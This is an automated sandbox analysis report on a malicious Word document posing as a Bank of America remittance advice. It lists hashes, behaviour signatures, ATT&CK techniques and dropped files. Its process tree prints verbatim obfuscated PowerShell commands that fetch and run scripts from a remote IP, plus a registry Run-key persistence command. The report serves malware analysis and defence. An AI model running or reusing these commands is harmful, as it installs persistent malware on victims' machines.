Overview

overview

10

Static

static

8

BoFA Remit...21.doc

windows7_x64

10

BoFA Remit...21.doc

windows10_x64

10

Analysis

  • max time kernel
    1199s
  • max time network
    1081s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-07-2021 15:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BoFA Remittance Advice-21721.doc

  • Size

    124KB

  • MD5

    d9351f959e1b09a54714ce11437581bb

  • SHA1

    3e82c790db6682d29426dfb7ce666ff3a05cbcd8

  • SHA256

    0f5f34545ede22937a9966d113b2ad9d533d0d499da986bfb49da61671c3e066

  • SHA512

    6b480e21e29915bf8ae435d6470ecdfb3cf0e3b627ec9356a1de0458eecafe733d91ce34fe08d7569bcd77eaeefe7270f6263742cdbcce96bd131395ffededf7

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BoFA Remittance Advice-21721.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01101010,01110101,01100111,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101010,01110101,01100111,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101010,01110101,01100111,00101110,01101010,01110011,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jug.js"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,01011011,01110110,01101111,01101001,01100100,01011101,00100000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100110,01110101,01100100,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2412
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\jug.js"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3600
          • C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\jug.js"
            5⤵
            • Adds Run key to start application
            PID:1160
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\jug.js" "C:\Users\Admin\AppData\Roaming\" /Y
          4⤵
            PID:4044

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      7d467f281450b54d873225284fcd0411

      SHA1

      b250a0801e2e17b1592420637257a6e57e883fdd

      SHA256

      da8716cf96a59db089e62845dae89ebc0876ea11b75f5c9d016d70c1117d3bef

      SHA512

      32e35ebff6f42b4692d4a9d5958af214c9e14d346f087502a898af5ae4f117a083be6f221bc82073ac6a78c846608d34f83de8a4df7750420b4b65fe8ba1a1b9

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\jug.js
      MD5

      78f0668dbe848311be3b827e9e355d37

      SHA1

      178ea288664a7b351009620a1a91cafd6c6082db

      SHA256

      4f4249d21d45dd1fd4b9126cf45c7f76a29c211ef2f547acefed0a482d94eee9

      SHA512

      ec07f481b94bb684f6229b4fa38ae966786415f70f79046ee8c8dd22bac5b195b7977ce50f0d2888c9d857279823c2f89572708701014e967678861337662f8b

      Download Submit
    • memory/1160-317-0x0000000000000000-mapping.dmp
      Download
    • memory/2176-306-0x0000000000000000-mapping.dmp
      Download
    • memory/2412-325-0x00000234C1956000-0x00000234C1958000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2412-324-0x00000234C1953000-0x00000234C1955000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2412-323-0x00000234C1950000-0x00000234C1952000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2412-309-0x0000000000000000-mapping.dmp
      Download
    • memory/2688-266-0x0000000000000000-mapping.dmp
      Download
    • memory/2688-283-0x000001F438870000-0x000001F438871000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2688-291-0x000001F438633000-0x000001F438635000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2688-290-0x000001F438630000-0x000001F438632000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2688-292-0x000001F438636000-0x000001F438638000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2688-280-0x000001F4200F0000-0x000001F4200F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3600-310-0x0000000000000000-mapping.dmp
      Download
    • memory/3916-122-0x00007FFC0B690000-0x00007FFC0C77E000-memory.dmp
      Filesize

      16.9MB

      Download
    • memory/3916-123-0x00007FFC09790000-0x00007FFC0B685000-memory.dmp
      Filesize

      31.0MB

      Download
    • memory/3916-114-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3916-118-0x00007FFC12630000-0x00007FFC15153000-memory.dmp
      Filesize

      43.1MB

      Download
    • memory/3916-119-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3916-117-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3916-116-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3916-115-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4044-311-0x0000000000000000-mapping.dmp
      Download